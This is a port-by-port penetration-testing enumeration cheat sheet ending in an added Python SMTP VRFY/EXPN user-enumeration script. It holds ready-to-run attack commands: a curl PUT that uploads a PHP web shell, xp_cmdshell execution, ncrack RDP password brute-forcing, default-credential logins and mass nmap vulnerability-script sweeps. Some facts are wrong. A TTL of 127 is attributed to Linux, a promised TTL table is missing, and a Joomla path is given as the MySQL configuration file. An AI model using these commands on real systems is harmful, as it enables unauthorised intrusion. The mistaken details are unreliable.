TTL can help us determine the operating system of the target machine. In a basic ping command, an output would look similar to the following:
> ping 10.10.10.10
PING 10.10.10.10 (10.10.10.10) 56(84) bytes of data.
64 bytes from 10.10.10.10: icmp_seq=1 ttl=127 time=88.4 ms
The TTL drops by 1 each time the packet passes through a router. If in the above example ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host.
A table of TTL values and their corresponding operating systems is listed below.
FTP - 21 TCP
# NMAP all ftp scripts check against FTP 21
# scripts located in /usr/share/nmap/scripts/
Kali> nmap --script=ftp-anon.nse,ftp-bounce.nse,ftp-brute.nse,ftp-libopie.nse,ftp-proftpd-backdoor.nse,ftp-syst.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,tftp-enum.nse -p 21 $TARGET
# Check for anonymous access (the Name/Password prompts come from the ftp client)
Kali> ftp $TARGET
Name: anonymous
Password: anything
SSH - 22 TCP
# NMAP all ssh scripts against SSH 22
# scripts located in /usr/share/nmap/scripts/
Kali> nmap --script=ssh2-enum-algos.nse,ssh-auth-methods.nse,ssh-brute.nse,ssh-hostkey.nse,ssh-publickey-acceptance.nse,ssh-run.nse,sshv1.nse -p 22 $TARGET
HTTP - 80 TCP
Kali> dirb http://$TARGET /usr/share/wordlists/dirb/big.txt -o dirb.txt
Kali> dirb http://$TARGET -r -o dirb-$TARGET.txt
Kali> gobuster -u http://$TARGET -w /usr/share/wordlists/dirb/big.txt -t 100
Kali> gobuster -u http://$TARGET -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
# A little for loop over every wordlist in the current directory so you can go do other stuff
Kali> for wordlist in *.txt; do gobuster -u http://$TARGET -w "$wordlist" -t 100; done
# dirsearch is fairly good
Kali> dirsearch -u http://$TARGET -e php
cURL
# robots.txt can give us a clue as to where to look next; you may have to send a User-Agent header
Kali> curl -s http://$TARGET/robots.txt
# Check all the methods
Kali> curl -vX OPTIONS $TARGET
# Get header
Kali> curl -i $TARGET
# Get everything
Kali> curl -i -L $TARGET
# Check for title and all links
Kali> curl $TARGET -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# Look at page with just text
Kali> curl $TARGET -s -L | html2text -width '99' | uniq
# Check if it is possible to upload
Kali> curl -v -X OPTIONS http://$TARGET/
Kali> curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://$TARGET/test/shell.php
# Basic
Kali> nikto -h http://$TARGET
# Include specific tuning, see further below
Kali> nikto -Tuning x 6 -h http://$TARGET
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
BurpSuite
I don't care who you are or what you're doing, but it's time to go poke the website with Burp. Play with all the things: GET params, POST params, cookies, user agents, referrers (in fact, all the headers); change GET requests to POSTs, take note of all error codes, fuzz parameter values and names, etc.
DNS - 53
Kali> for sub in $(cat subdomains.txt); do host $sub.domain.com | grep "has address"; done
Kali> dnsrecon -d $TARGET -D wordlist.txt -t std --xml output.xml
POP3 - 110 TCP
# Connect
Kali> telnet $TARGET 110
# Login
USER pelle@$TARGET
PASS admin
# or
USER pelle
PASS admin
# List all emails
list
# Retrieve email number 5, for example
retr 5
DATABASES
MSSQL - 1433
Kali> nmap -sU --script=ms-sql-info $TARGET
# Log in to mssql
Kali> sqsh -S $TARGET -U sa
# Execute commands
mssql> xp_cmdshell 'date'
mssql> go
ORACLE - 1521
# Check version or status of host specified
Kali> tnscmd10g version -h $TARGET
Kali> tnscmd10g status -h $TARGET
MYSQL - 3306
# Connect to instance
Kali> mysql --host=$TARGET -u root -p
# NMAP. Note: this command might overload the target and it will appear as if it's down. Give it some time.
Kali> nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $TARGET -p 3306
# Configuration location
/var/www/html/configuration.php
CUPS - 631
The Common UNIX Printing System has become the standard for sharing printers on a Linux network. You will often see port 631 open during your priv-esc enumeration when you run netstat. You can log in to it here: http://localhost:631/admin
You authenticate with the OS users. Find the version: test cups-config --version. If this does not work, browse to http://localhost:631/printers and read the CUPS version from the title bar of your browser.
There are known vulnerabilities for it, so check searchsploit.
NFS - 2049
Kali> showmount -e $TARGET
# If you find anything you can mount it like this:
Kali> mount $TARGET:/ /tmp/NFS
Kali> mount -t nfs $TARGET:/ /tmp/NFS
RPC
Examples
Kali> rpcinfo -p $TARGET
RPCBind
Kali> rpcbind -p 192.168.1.101
RDP - 3389
Examples
# Connect to instance
Kali> rdesktop -u admin -p password $TARGET
# Test logging in to see what OS is running
Kali> rdesktop -u guest -p guest $TARGET -g 94%
# Brute force logins for User with password list
Kali> ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://$TARGET
SMB - 139/445 TCP
# Sometimes shows logged in users/addresses
Kali> nbtscan $TARGET -R 54
# NMAP
Kali> nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $TARGET -p 445
SMTP - 25 TCP
VRFY username (verifies if username exists -> enumeration of accounts)
EXPN username (verifies if username is valid -> enumeration of accounts)
# Other commands
HELO - Identifies the client to the server (basic SMTP).
EHLO - Extended SMTP.
STARTTLS - SMTP is communicated over an unencrypted protocol. By starting a TLS session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify if the email user's mailbox exists.
# NMAP all smtp scripts
Kali> nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $TARGET
# Check for users (requires txt list of users.txt)
Kali> for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 $TARGET 25 2>/dev/null | grep ^"250"; done
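Added example, not from the original cheat sheet: it drives the VRFY/EXPN exchange above from Python so you can check whether a mail server you administer confirms account names (250) or has the commands disabled (252/502), handling the multi-line EHLO reply that the nc one-liner ignores. It assumes the server listens on $TARGET:25 without requiring STARTTLS first; the client name probe.example is a constructed placeholder.

```python
"""Check whether an SMTP server leaks accounts through VRFY/EXPN.
Added example, not from the original cheat sheet: it sends the SMTP
commands listed above over a raw socket and classifies the reply code.
Assumes the server is on $TARGET:25 and does not require STARTTLS."""
import socket

# 250/251 confirm the address (enumeration works), 252 means VRFY is
# disabled but mail is still accepted, 5xx means rejected/unsupported.
VERDICTS = {"250": "exists", "251": "exists (forwarded)",
            "252": "vrfy-disabled", "502": "unsupported",
            "550": "no such user", "553": "rejected"}

def read_reply(sock):
    """Read one complete SMTP reply from anything with a recv() method.
    Continuation lines look like 'NNN-text'; the final line is 'NNN text'
    (or a bare 'NNN'), so keep reading until that final line arrives."""
    data = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        data += chunk
        last = data.decode("utf-8", "replace").splitlines()[-1]
        if data.endswith(b"\n") and (len(last) == 3 or last[3:4] == " "):
            return data.decode("utf-8", "replace").splitlines()

def classify(reply_lines):
    """Map the final line's 3-digit code to what it tells an enumerator."""
    code = reply_lines[-1][:3]
    return VERDICTS.get(code, "other (" + code + ")")

def probe(host, users, port=25, timeout=5):
    """EHLO once, then VRFY and EXPN each user; return {user: {cmd: verdict}}."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        read_reply(s)                               # 220 banner
        s.sendall(b"EHLO probe.example\r\n")        # probe.example is a placeholder
        read_reply(s)                               # 250-... capability list
        for user in users:
            results[user] = {}
            for cmd in ("VRFY", "EXPN"):
                s.sendall(f"{cmd} {user}\r\n".encode())
                results[user][cmd] = classify(read_reply(s))
        s.sendall(b"QUIT\r\n")
    return results

if __name__ == "__main__":        # usage: python3 smtp_vrfy_check.py $TARGET root admin
    import sys
    print(probe(sys.argv[1], sys.argv[2:]))
```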